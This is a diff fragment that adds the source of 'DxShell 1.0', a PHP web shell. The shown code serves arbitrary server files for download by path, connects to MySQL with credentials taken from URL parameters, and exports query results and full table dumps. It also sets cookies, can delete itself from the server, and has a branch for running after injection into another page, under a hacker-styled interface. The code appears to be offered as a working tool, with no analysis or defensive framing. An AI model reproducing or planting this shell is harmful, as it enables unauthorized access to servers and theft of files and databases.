+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT');   //Date('r'
+	header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT');
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
